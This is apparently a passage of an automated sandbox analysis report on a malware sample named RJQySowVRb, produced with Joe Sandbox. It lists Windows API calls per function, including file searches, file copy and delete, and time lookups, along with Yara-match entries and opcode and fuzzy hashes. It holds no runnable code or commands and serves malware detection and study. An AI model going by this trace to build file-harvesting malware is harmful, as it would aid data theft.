                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022E7C17
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022E7C1E
                                          • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022E7C2B
                                          • wsprintfA.USER32 ref: 022E7C5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                                          • String ID:
                                          • API String ID: 377395780-0
                                          • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                          • Instruction ID: 7ab8456280568004345be6c728328476938821766eb4fb1773edd4f3bdf85d72
                                          • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                          • Instruction Fuzzy Hash: 101139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF606A2280D3795940CBB1
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022E7CCA
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022E7CD1
                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022E7CE4
                                          • wsprintfA.USER32 ref: 022E7D1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                          • String ID:
                                          • API String ID: 3317088062-0
                                          • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                          • Instruction ID: 51186470935b5ea7dc09d66f4cb3f123c7afd4d01f53faeeaab8c5fbe378d6ae
                                          • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                          • Instruction Fuzzy Hash: 89115EB1A45218EFEB248B94DC49FA9B7B9FB05721F1043AAF51AA32C0D7745940CF51
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strtok_s
                                          • String ID:
                                          • API String ID: 3330995566-0
                                          • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                          • Instruction ID: d592912b6ddba72c6b9ed82fcbad3204c0218892bf195751ca6e5ae09ca43e24
                                          • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                          • Instruction Fuzzy Hash: 161125B4E1020AEFCF14CFE6E848BEEB7B5BB44306F40C028E026A6254D7749500CF55
                                          APIs
                                          • CreateFileA.KERNEL32(022E3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022E3D55,?), ref: 022E9563
                                          • GetFileSizeEx.KERNEL32(000000FF,022E3D55), ref: 022E9580
                                          • CloseHandle.KERNEL32(000000FF), ref: 022E958E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSize
                                          • String ID:
                                          • API String ID: 1378416451-0
                                          • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                          • Instruction ID: abc0761735a47766ec3619e024c25d9cef0481d3881f699767b18d813af70466
                                          • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                          • Instruction Fuzzy Hash: 78F04F39E50208BBDF20DFF0DC49B9E77BAEB49710F50C654FA12A7284D67596418B40
                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D31
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022E6D4F
                                          • CloseHandle.KERNEL32(00000000), ref: 022E6D60
                                          • Sleep.KERNEL32(00001770), ref: 022E6D6B
                                          • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D81
                                          • ExitProcess.KERNEL32 ref: 022E6D89
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                          • Instruction ID: f691de4af503793782dbe8b2146c289a26ed7da5ca3b9e2e3c53031138073a1c
                                          • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                          • Instruction Fuzzy Hash: DDF05E78960306AEEF10ABE1DC09BBD767AEB25751FD01518F503A51D4CBB05100DA66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: `o@
                                          • API String ID: 0-590292170
                                          • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                          • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                          • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                          • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                          APIs
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                          • lstrcatA.KERNEL32(?,0097BAC0), ref: 00414C08
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                            • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,009785D8,?,000003E8), ref: 00414A4A
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                            • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                            • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                          • String ID: UaA
                                          • API String ID: 2104210347-3893042857
                                          • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                          • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                          • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                          • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • GetSystemTime.KERNEL32(?,00948EF0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SystemTimelstrcpy
                                          • String ID: cI@$cI@
                                          • API String ID: 62757014-1697673767
                                          • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                          • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                          • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                          • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                          APIs
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                          • lstrcatA.KERNEL32(?,0097B8E8), ref: 004150A8
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                          • String ID: aA
                                          • API String ID: 2699682494-2567749500
                                          • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                          • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                          • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                          • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                          • lstrlen.KERNEL32(00000000), ref: 022DBF06
                                            • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                          • StrStrA.SHLWAPI(00000000,004213E0), ref: 022DBF34
                                          • lstrlen.KERNEL32(00000000), ref: 022DC00C
                                          • lstrlen.KERNEL32(00000000), ref: 022DC020
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                          • String ID:
                                          • API String ID: 1440504306-0
                                          • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                          • Instruction ID: c1893c81ce1cd6680f137be74c8542ccca9c32687fbe4f244ae07081069c2ad0
                                          • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                          • Instruction Fuzzy Hash: AAB1FB71920318ABCF18EBE4DD95EFE733AAF64304F804159E507A6194EF386A48DF61
                                          APIs
                                          • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                          • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                          • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                          • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFileNextlstrcat
                                          • String ID: !=A
                                          • API String ID: 3840410801-2919091325
                                          • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                          • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                          • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                          • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                          APIs
                                            • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E51E1
                                          • lstrcat.KERNEL32(?,00421070), ref: 022E51FE
                                          • lstrcat.KERNEL32(?,0064A5F8), ref: 022E5212
                                          • lstrcat.KERNEL32(?,00421074), ref: 022E5224
                                            • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4B93
                                            • Part of subcall function 022E4B77: FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                            • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                            • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                            • Part of subcall function 022E4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                            • Part of subcall function 022E4B77: FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                          • String ID:
                                          • API String ID: 2667927680-0
                                          • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                          • Instruction ID: 77f1be27e664de97440a867420ffa9e55294e441ca1e3c15efdf699cc591b17a
                                          • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                          • Instruction Fuzzy Hash: 9621DA7AA503087BDB14FBF0DC45EED337EAB55300F804189B68A92194DE7496C9CFA2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpynlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 1206339513-0
                                          • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                          • Instruction ID: fc3a89c7cd4047c8deef02a0682037777e6a97a3e554c36471a3bf2d0a72fd53
                                          • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                          • Instruction Fuzzy Hash: 1301DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F90A9B305C635AA40DB95